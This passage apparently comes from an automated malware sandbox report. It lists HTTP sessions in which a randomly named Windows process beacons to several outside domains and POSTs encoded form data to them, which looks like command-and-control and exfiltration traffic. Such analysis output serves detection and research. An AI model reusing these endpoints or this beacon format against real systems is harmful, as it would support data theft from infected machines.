                                                                                                Data Ascii: wp0gaH6wzA1ZcDBPRgnhGx8fP/DF5gQzLnUv9kQpdUDTWFcx/FURNKOtbfflTTkPtKXlNfeWO4+0lSy+K/YIt4R8IqRts+omMG8LfGVICijT9Sjw9nzGveshZN8ukm2+kNVjAQ8BMo26Ysacpa0YNmQ0VmYWgj+oMWrCadlKtuLOzZZHSs1m9U4DqUVtChPom0Rj4ahasovGuAlx5ctE4TOEDrpXDUa8JT0wxOiBR+M1erFd+Mo


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                32 | 192.168.11.20 | 49778 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:01.407815933 CET | 503 | OUT | GET /5lh9/?Lr3=uHMLTHRPCpsdapr&IBQP=PaxL/KCEHD9JblfI8738jkEyOBGmpH0n0YqV+FGo7SRz69ewzjAIy/AjxHMCTjWvQh2WDn5x5gTk9H7000rUU48po7SBA+lXfQsIcMqVCaJxO3wRg1gJgNU= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:03:01.548108101 CET | 400 | IN | HTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:03:01 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Lr3=uHMLTHRPCpsdapr&IBQP=PaxL/KCEHD9JblfI8738jkEyOBGmpH0n0YqV+FGo7SRz69ewzjAIy/AjxHMCTjWvQh2WDn5x5gTk9H7000rUU48po7SBA+lXfQsIcMqVCaJxO3wRg1gJgNU="}</script></head></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                33 | 192.168.11.20 | 49779 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:06.922224045 CET | 753 | OUT | POST /ywsl/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.rmzl-0.rest
                                                                                                Origin: http://www.rmzl-0.rest
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.rmzl-0.rest/ywsl/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=01WPeAEXQZygY1yeFjZG/2UmCCz6XjHsJxAihH2ngNMZNPLodR2oEMxUztJzguHzflGMa6MiUOU4VhJxVQeYHSQ1fhPwmVZ+oCb8C8jRlj+2GFgcKb4HcZ4v/Rxyo8VEt+Drsc0jmbkSl1mLmMCnVUMyr4JrHeuTC35tnumuh27NLEQaLHNZG2VXsNGEHGlAaQ==


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                34 | 192.168.11.20 | 49780 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:09.579833031 CET | 773 | OUT | POST /ywsl/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.rmzl-0.rest
                                                                                                Origin: http://www.rmzl-0.rest
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.rmzl-0.rest/ywsl/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=01WPeAEXQZygYWqeJiZG32UnHCz6OTHgJxcihGi3h/oZNrPocQ2oFMxU7NJqtOGeflDxa7wiUOA4Vg5xUnyfBCQgXBP2o1Z+oCb8C/e8lgO2H1QcL64ADp4s4Rxys8UDt+DFsZtEmZsSl3+LmZ+kMkM4v4ILC9TYDWVy38iRgH21KSdAW159FlJlo9/sFEkbHRRgHbviykjRaH4J1oEQ7Ao=


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                35 | 192.168.11.20 | 49781 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:12.235996962 CET | 2578 | OUT | POST /ywsl/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.rmzl-0.rest
                                                                                                Origin: http://www.rmzl-0.rest
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.rmzl-0.rest/ywsl/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:03:12.236040115 CET | 5344 | OUT
                                                                                                Data Ascii: Fa9fuWk5cx1iF430pfUtTiRG/YwUatVGGkRHx5gvVC965fUZkWksOr7b8bZhkdwo9abZpQas5tLYgvDAwluutciuQ94NwmqYt6X/RoIbF0DmPSXdzYkffDaHTeJWDyxra7Q3mcanbXkUf4p/Kxx/jCnkrwfsGJNBCpQzGOQR4heALYybFO77LLmiQKqBXmDxAkSqHjhIrkOGSs6a02PJBBLWJQ9DyOmkveOFn9hvy5cZJHfhZdP


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                36 | 192.168.11.20 | 49782 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:14.907131910 CET | 495 | OUT | GET /ywsl/?IBQP=53+vd04YW42mc36XCB5F63IhABrVfiuEAy5fmEaureJqNK/sdjqjQsdG685okMjqTRenKpUPfuASSj1yCn6YHCZWeE+kvE1krRyqLOvcoxG1FUsRKY0MVeU=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.rmzl-0.rest
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:03:15.045154095 CET | 400 | IN | HTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:03:14 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=53+vd04YW42mc36XCB5F63IhABrVfiuEAy5fmEaureJqNK/sdjqjQsdG685okMjqTRenKpUPfuASSj1yCn6YHCZWeE+kvE1krRyqLOvcoxG1FUsRKY0MVeU=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                37 | 192.168.11.20 | 49783 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:20.389045954 CET | 750 | OUT | POST /jwt5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.imgiu9.vip
                                                                                                Origin: http://www.imgiu9.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.imgiu9.vip/jwt5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=MYpIzl/C6wFydLkrrvx81vCM0HOBH30hAF4EwPk1Pw1XU+DlZKDwkicrXaaYLXVBxGzecj3uN7rtyrvSVMkYjlfIr2fHxIahCz9bbTQfH4zeeHVrFdOY9am9k/WcoTo+dwiK2a0sbsSQMb5uYk6ViuF4++gVJW53N7cvt9ug4zDdnfHfWaumIAKKPx9Jc+CxGA==


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                38 | 192.168.11.20 | 49784 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:23.045794964 CET | 770 | OUT | POST /jwt5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.imgiu9.vip
                                                                                                Origin: http://www.imgiu9.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.imgiu9.vip/jwt5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=MYpIzl/C6wFyPaUrpMJ8i/CLq3OBSn0bAFkEwLclTTRXUcblYLDwnicrDKanWHUDxG/Wcj7uN7/tyqfSV9kbl1fGyGfF/oahCz9bbTFXH8XeeSFrKZSX06m8j/WcsTo6dwi02boKbpWQMZhuYwuW3eF+0eh5NVcHEb9YkO+o5WGlrpKFLoaCLTW4LBEhe8DqbDnjURckYcmEsDX7FruTmoU=


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                39 | 192.168.11.20 | 49786 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:25.701711893 CET | 2578 | OUT | POST /jwt5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.imgiu9.vip
                                                                                                Origin: http://www.imgiu9.vip
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.imgiu9.vip/jwt5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=MYpIzl/C6wFyPaUrpMJ8i/CLq3OBSn0bAFkEwLclTTZXXvTlZorwmicrAKamWHUCxHXSciHhN5HtzIXSTIEbs1fGv2fGxIa0CztfbTVXH8XeeV9rDtOXy6m9k/WAoTpddxLP2YE8b6eQM6ZuaDWW1+F8zehhNVgYEbghkK395Ryl68zfRbagWxGMIw02Z9q4QjDWfAA0RayTzCLyXJCK5OklmR2RW7e0YkLunhCFvZ0Cimx23b+iJbjFL1ChA2Tvho5VkwTM5KPGmNhQHiVC9ehzsS3qJqKWtOVt4WRp+UVJFs7iY6AKA3rIKwd3K9LNPyP2YzuJYl2hTCglY5CEqfZKEKKVX2Bzrxn/q8ERLPNfxcYizjc3wtMeHERRR/BvOJ842Lobx1IoOv7EkDOPRYRxuw8+OmYWmG+ssvWRORh2lpke7UFg+U02Gfv99poJJ39L8/oKX0S8Hwp0i6p1pmhiEKpzdcCWV50bOoYUVBqorA59ka0PtGlLCcTIm6tlrhQ5E4bBZcO6W77jB2Pp/+q/xsC1fb1WiU9xtZ6Mc46QLNqb87EY1xn0MAiZ3lNp5P6zvHFh46khg47IMXExjagFC4s7553GAq+gIdA+ExKBPIMHnfKwrXmIC9Ws2sJeNHjgYCL0KTPIl3bW//SVwWk0OXYuV99Rzjml6s/+gJZdm/5CaUAi4ZSdsoTR0R4RYrXdY6/PlNw9WZhtdkkrF+VfAvFT2rG4pVsyNIXhXztfSrNfvEq/A2P85CzIrjx8O0Sgcf5CQxTkrDLaMqoiXK1nG3VXwWQo97InSpN6QeKxKdJVJqKBADaFMfKt29GUo3hSo82eWU6WPeD1jf++dncs8YerpKYqWmqOKRXuN4Dszi/u5iNNLig8vSwZxigjSWG8eLi6dWpJ5w8LGGUlxlDj3eAcNhJ8O73qBnXIUhvDzzXAUR2A8EUlr7Q9Yq9VezYxYfuvRqXNVM7KGWUCocXs7qlzzQCVXIdeLgyMgQ8O8rg [TRUNCATED]
                                                                                                Nov 11, 2024 17:03:25.701786041 CET | 5341 | OUT
                                                                                                Data Ascii: JDmwTHAKwO8YGaILLJ483ZPpclE/v4kyFeyZ2ckwbIyOlTQZTfbNDKqc6B3s1VSqpPCuyclIhleKQGcuAO4G/8lL4uP1PHy5uJXtEr9FQaKW0mdVaRDot0ybKVke/XwBxzgoYPFWL6PkuMNsvzWqkDwXVhOLSTBmp4/QQOGEDZXd914mPNpHzj/M853eqbsfz096Is3dKVx4qp8hz64ssRNdV7ILArNRcyVSX/ZbBkW9m4Abius


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                40 | 192.168.11.20 | 49787 | 3.33.130.190 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:28.354531050 CET | 494 | OUT | GET /jwt5/?Lr3=uHMLTHRPCpsdapr&IBQP=BaBowTLo1loeAIpV7vVht/vx80fLXkEoZngrzLsBdCIsVeqAfJzss3Y0HZ2vI18y1WvYWAn/Doi+9ZPlOuIBlgbOtHjG5I6MGjR7KAsuAsv6BFY+Gayvzv4= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.imgiu9.vip
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:03:28.518465042 CET | 400 | IN | HTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:03:28 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Lr3=uHMLTHRPCpsdapr&IBQP=BaBowTLo1loeAIpV7vVht/vx80fLXkEoZngrzLsBdCIsVeqAfJzss3Y0HZ2vI18y1WvYWAn/Doi+9ZPlOuIBlgbOtHjG5I6MGjR7KAsuAsv6BFY+Gayvzv4="}</script></head></html>


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                41 | 192.168.11.20 | 49788 | 45.79.252.94 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:33.915977001 CET | 774 | OUT | POST /s6a5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.premium303max.rest
                                                                                                Origin: http://www.premium303max.rest
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.premium303max.rest/s6a5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=jUmPRJkFv6cQJzv/G4ImxSgvMxkj3R4bunTWPwHxv/3Q9UtQQB5r4AUpi9T9Lw1F9RmaYTqS2t7xxL4/OlvGgobYFhCnI9alcy77kT1wIyKpKJOAS6en5gAfGwjb8RdLrYU7uMgNJP/AQjaCUeoPL7N4k1LZ9TAcJQt5Z7KfofSZ2ZAtM8V1gRUocuPDskIZ2w==
                                                                                                Nov 11, 2024 17:03:34.560483932 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                date: Mon, 11 Nov 2024 16:03:33 GMT
                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                x-ua-compatible: IE=edge
                                                                                                x-redirect-by: WordPress
                                                                                                vary: X-Forwarded-Proto,Accept-Encoding
                                                                                                location: https://www.premium303max.rest/s6a5/
                                                                                                content-length: 0
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                server: Apache
                                                                                                connection: close


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                42 | 192.168.11.20 | 49789 | 45.79.252.94 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:36.574029922 CET | 794 | OUT | POST /s6a5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.premium303max.rest
                                                                                                Origin: http://www.premium303max.rest
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.premium303max.rest/s6a5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=jUmPRJkFv6cQG3r/AZIm6SgsQhkj5x5SunfWPyrhvtTQ91dQRA5r7AUppdTlVA149RbvYSGS2sbxxOc/SCbHh4baMBCyVtalcy77kThJIyCpK6WATbemwAAeWgjb4RdHrYU8uN9oJNHAQhSCULcQSrNE6FKm5RoVADdbYratgsWhzPN3ROhRjCIaYe2rumJCr5Z+K8Hy//jsx41nTVH78Mc=
                                                                                                Nov 11, 2024 17:03:36.978610039 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                date: Mon, 11 Nov 2024 16:03:36 GMT
                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                x-ua-compatible: IE=edge
                                                                                                x-redirect-by: WordPress
                                                                                                vary: X-Forwarded-Proto,Accept-Encoding
                                                                                                location: https://www.premium303max.rest/s6a5/
                                                                                                content-length: 0
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                server: Apache
                                                                                                connection: close


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                43 | 192.168.11.20 | 49790 | 45.79.252.94 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:39.229911089 CET | 2578 | OUT | POST /s6a5/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.premium303max.rest
                                                                                                Origin: http://www.premium303max.rest
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.premium303max.rest/s6a5/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:03:40.075690985 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                date: Mon, 11 Nov 2024 16:03:39 GMT
                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                x-ua-compatible: IE=edge
                                                                                                x-redirect-by: WordPress
                                                                                                vary: X-Forwarded-Proto,Accept-Encoding
                                                                                                location: https://www.premium303max.rest/s6a5/
                                                                                                content-length: 0
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                server: Apache
                                                                                                connection: close


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                44 | 192.168.11.20 | 49791 | 45.79.252.94 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:41.883053064 CET | 502 | OUT | GET /s6a5/?IBQP=uWOvS5Yjm7YhBkSIFatO2CB0bHUF5BB4gnfnOBn+6NyL3nxueSJAzVs8h9i9KFJmzD+/RgmGnJLg06gAUSOGsu+lNFioW5q3ewPUsSx7AySWAK21Xanb2Bs=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.premium303max.rest
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:03:42.595132113 CET | 540 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                date: Mon, 11 Nov 2024 16:03:41 GMT
                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                x-ua-compatible: IE=edge
                                                                                                x-redirect-by: WordPress
                                                                                                vary: X-Forwarded-Proto,Accept-Encoding
                                                                                                location: http://premium303max.rest/s6a5/?IBQP=uWOvS5Yjm7YhBkSIFatO2CB0bHUF5BB4gnfnOBn+6NyL3nxueSJAzVs8h9i9KFJmzD+/RgmGnJLg06gAUSOGsu+lNFioW5q3ewPUsSx7AySWAK21Xanb2Bs=&Lr3=uHMLTHRPCpsdapr
                                                                                                content-length: 0
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                server: Apache
                                                                                                connection: close


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                45 | 192.168.11.20 | 49792 | 43.156.106.109 | 80 | 7940 | C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Nov 11, 2024 17:03:48.159785032 CET | 765 | OUT | POST /b38f/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.155n8etsy.autos
                                                                                                Origin: http://www.155n8etsy.autos
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.155n8etsy.autos/b38f/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=WGtH2WknHoKs1OnAaJdibQYT4q16CEqrIFZDHsmtZoJACRKndXXWIEXEWeY6VmT0gSEraAVvIEztZlmvIs/CnXT8sR0MLEtqfjT7LWXqmQmm5JT96+gB6ErczpGGboN1j+A3eV8VZbWaUTH/otGjQOApd5phCUZ7ikKN7q4Zo4+mWQ3Kah2+ByY08C4MU2v39A==
                                                                                                Nov 11, 2024 17:03:48.564088106 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: Tengine
                                                                                                Date: Mon, 11 Nov 2024 16:03:48 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Content-Length: 58288
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                ETag: "6729ca88-e3b0"
                                                                                                Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
